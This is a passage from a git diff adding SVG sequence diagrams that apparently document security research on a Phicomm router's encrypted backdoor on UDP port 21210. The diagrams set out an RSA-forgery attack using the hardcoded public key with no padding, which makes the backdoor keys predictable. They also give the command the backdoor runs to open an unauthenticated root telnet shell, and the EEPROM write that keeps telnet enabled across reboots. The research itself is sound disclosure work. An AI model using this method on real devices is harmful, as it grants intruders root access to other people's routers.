font-family="sans-serif" font-size="15pt" font-style="italic" font-weight="normal" text-decoration="normal" x="488.5432992742884" y="2453.786280939001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">or</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">-  "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="173.80995996459603" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="246.40995843871713" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to write a flag to a physical volume,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   which the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="267.5432916448939" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="442.15996034606576" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon will check for</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2517.8705400390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   when the system is rebooted, and launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="584.2432809637415" y="2517.8705400390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2539.2319597390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   if it finds it.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2560.5933794390016" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Remember that we have set </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="469.7599740789759" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="666.4433084295619" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2603.316218839002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the empty string, so the suffix is all we need to</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2624.677638539002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">know.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2646.0390582390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="330.6099649237025" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="424.02662904723763" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 105.53069038743945 2675.945045819 L 201.65707903743944 2675.945045819 L 201.65707903743944 2703.714891429 L 133.7989691237728 2703.714891429" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(116.21140023743945,2703.714891429) translate(-116.21140023743945,-2703.714891429)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 134.0125833207728 2694.8142998873336 L 116.21140023743945 2703.714891429 L 134.0125833207728 2712.6154829706666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2735.757020979" width="480.60842667293946" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2757.1184406790003" width="302.35841665935914" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2778.4798603790005" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2799.8412800790006" width="501.35843811703126" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2821.202699779001" width="293.15842591" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="292.12400302077276" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="342.5406709590052" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hash of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="428.8906694331263" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="522.3073335566614" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="282.07399996901495" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="444.9739938654993" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2797.7051381090005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="155.3740030207728" y="2819.0665578090006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Here, all we need to do is compute the MD5</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="155.3740030207728" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">hash of </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="245.607332793722" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="324.22400149489386" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> or </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="361.7573343196009" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 116.21140023743945 2848.972545389 L 212.33778888743944 2848.972545389 L 212.33778888743944 2876.7423909990002 L 144.4796789737728 2876.7423909990002" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(126.89211008743945,2876.7423909990002) translate(-126.89211008743945,-2876.7423909990002)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 144.6932931707728 2867.8417994573338 L 126.89211008743945 2876.7423909990002 L 144.6932931707728 2885.6429825406667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="375.47930444793406" y="2908.7845205490003" width="324.39175186825196" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="378.68351740293406" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="435.41685099058054" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="598.3168448870649" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 126.89211008743945 2936.5543661590004 L 930.8706817903475 2936.5543661590004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(948.4582506766808,2936.5543661590004) translate(-948.4582506766808,-2936.5543661590004)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 930.6570675933475 2927.653774617334 L 948.4582506766808 2936.5543661590004 L 930.6570675933475 2945.454957700667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="995.097350355014" y="2968.5964957090005" width="444.4750834531824" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="2989.9579154090006" width="423.8250838346521" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3011.319335109001" width="409.64176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3032.680754809001" width="394.2250877447168" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3054.042174509001" width="183.6084228582422" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3075.4035942090013" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3096.7650139090015" width="446.1584178037683" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3118.1264336090017" width="442.9917555875818" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3139.487853309002" width="436.6250868864099" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3160.849273009002" width="464.625093085293" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3182.210692709002" width="484.7417541570703" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3203.5721124090023" width="445.4917465276758" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="998.301563310014" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1014.4348965161907" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1020.7848964208233" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1183.6848903173077" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1282.3682246678936" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1384.5015559667218" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1039.0015640729534" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1139.3515625470745" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1389.818222092973" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1409.3682213300335" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">launching an unencrypted </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1267.0182381147015" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1348.6849022382366" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> shell</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1027.3182297223675" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">root</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1074.2182312482464" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. No credentials are required to</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3073.267452239001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">log into this shell.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3094.6288719390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="998.301563310014" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1014.4348965161907" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1020.7848964208233" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1183.6848903173077" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1282.3682246678936" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1386.1848903173077" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1039.0015640729534" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1139.3515625470745" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">iwpriv ra0 e2p 26=7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1408.9848938459027" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1428.5348930829632" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">writing the bytes [HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1236.4348946088421" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">7010</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1287.3015594953167" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">] to </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1327.8848915570843" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">EEPROM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1422.1682243817913" y="3158.713131039002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">at offset </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1087.6848946088421" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x26</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1137.6682281964886" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> (virtual address </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1307.0182343000042" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x40026</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1395.1515655988323" y="3180.074550739002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">). This</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">code will instruct the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1214.0182228559124" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1388.6348915570843" y="3201.435970439002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1097.9348946088421" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1348.4015541547406" y="3222.7973901390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> on boot.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 969.8196703766807 3231.3419580190002 L 1055.2653491766807 3231.3419580190002 L 1055.2653491766807 3259.1118036290004 L 987.407239263014 3259.1118036290004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(969.8196703766807,3259.1118036290004) translate(-969.8196703766807,-3259.1118036290004)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 987.620853460014 3250.211212087334 L 969.8196703766807 3259.1118036290004 L 987.620853460014 3268.012395170667 Z"/></g></g></g><g/><g/></g></svg>
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_lockpick.svg b/Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_lockpick.svg
new file mode 100644
index 0000000..4d55a7e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_lockpick.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1672" height="3333"><desc>title%20Picking%20the%20Lock%20on%20Phicomm's%20Encrypted%20Backdoor%2C%20on%20UDP%20Port%2021210%0A%0Aparticipant%20Client%0Aparticipant%20Server%0A%0Aactivate%20Client%20%23brown%0AClient-%3EServer%3ASend%20the%20token%20%22%3Ccolor%3A%23red%3EABCDEF1234%3C%2Fcolor%3E%22%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E41424344454631323334%3C%2Fcolor%3E%5D%0A%0Aactivate%20Server%20%23brown%0A%0AServer-%3EServer%3Acompute%20MD5%20hash%20of%20128-byte%20buffer%5Cnbeginning%20with%20%22%3Ccolor%3A%23red%3EK2_COSTDOWN__VER_3.0%3C%2Fcolor%3E%22%5Cnwith%20the%20rest%20of%20the%20bytes%20left%20null.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AClient%3C--Server%3AReply%20with%20the%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E.%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E812B50867EFB281491D8F9285D007914%3C%2Fcolor%3E%5D%0A%0Adeactivate%20Server%0A%0AClient-%3EClient%3AProduce%20a%2032-byte-long%20message%20called%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnthat%20the%20Server%20will%20decrypt%20with%20**RSA_public_decrypt()**%2C%5Cnusing%20the%20hardcoded%20public%20key.%5Cn%5CnTwo%20things%20are%20essential%20here%3A%5Cn%5Cn(1)%20the%20fate%20of%20this%20message%20is%20to%20be%20decrypted%20with%20the%5Cn%3Ccolor%3A%23darkblue%3E**HARDCODED%20PUBLIC%20KEY**%3C%2Fcolor%3E%20and%20then%20**XOR**ed%20with%20a%20%5Cnrandomly%20generated%20secret%20text%2031%20ASCII-printable%5Cnbytes.%5Cn%5Cn(2)%20the%20result%20of%20these%20two%20operations%20will%20then%20be%5Cnconcatenated%20with%20the%20salt%20%3Ccolor%3A%23purple%3E**using%20sprintf%20and%20the%20%25s%5Cnformat%20string**%3C%2Fcolor%3E.%5Cn%5CnIf%20we%20can%20discover%20a%20phony%20ciphertext%20that%2C%20when%20decrypted%20with%5Cn**RSA_public_decrypy()**%2C%20with%20the%20%3Ccolor%3A%23darkblue%3E**HARDCODED%20PUBLIC%20KEY**%3C%2Fcolor%3E%5Cnand%20the%20**RSA_NO_PADDING**%20option%2C%20yields%20a%20bytestring%20that%5Cnbegins%20with%20a%20byte%20between%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7f%3C%2Fcolor%3E%2C%20then%20we%20will%20have%20a%5Cn1%20in%2092%20chance%20of%20tricking%20the%20Server%20into%20generating%20a%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E%5Cnthat%20begins%20with%20a%20**NULL%20BYTE**.%20This%20will%20cause%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%5Cnto%20be%20nothing%20but%20hashes%20of%20their%20respective%20salts.%5Cn%5CnStore%20the%20result%20of%20this%20search%20as%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E.%0A%0A%0A%0Aactivate%20Client%20%23salmon%0A%0AClient--%3EServer%3ASend%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20to%20Server%0A%0AServer-%3EServer%3ADecrypt%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20with%20**RSA_public_decrypt()**%5Cnand%20store%20result%20as%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23salmon%0A%0AServer-%3EServer%3AGenerate%20a%20string%20of%2031%20random%2C%20printable%5Cncharacters%20(between%20ASCII%20codes%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7e%3C%2Fcolor%3E)%5Cnand%20store%20the%20result%20as%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AServer-%3EServer%3AEncrypt%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20**RSA_public_encrypt()**%5Cnusing%20the%20hardcoded%2C%201024-bit%20public%20RSA%20key%2C%20with%20the%5Cn**RSA_NO_PADDING**%20option%20set%20(%22Textbook%20RSA%22).%5Cn%5CnStore%20the%20128-byte%20result%20as%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23pink%0A%0A%0AClient%3C--Server%3ASend%20128-byte%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20to%20Client%0A%0A%0Aactivate%20Client%20%23orange%0A%0A%0AServer-%3EServer%3A**XOR**%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20the%20first%2031%20bytes%5Cnof%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%2C%20and%20store%20the%20result%20in%5Cn%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E.%0A%0A%0A%0AClient--%3EClient%3AWe%20no%20longer%20need%20to%20be%20able%20to%20decrypt%20the%5Cn%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%2C%20and%20so%20we%20no%20longer%5Cnhave%20any%20need%20of%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E.%5Cn%5CnWe%20can%20simply%20set%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20to%20the%5Cn**empty%20string**.%0A%0A%0Aactivate%20Client%20%23pink%0A%0A%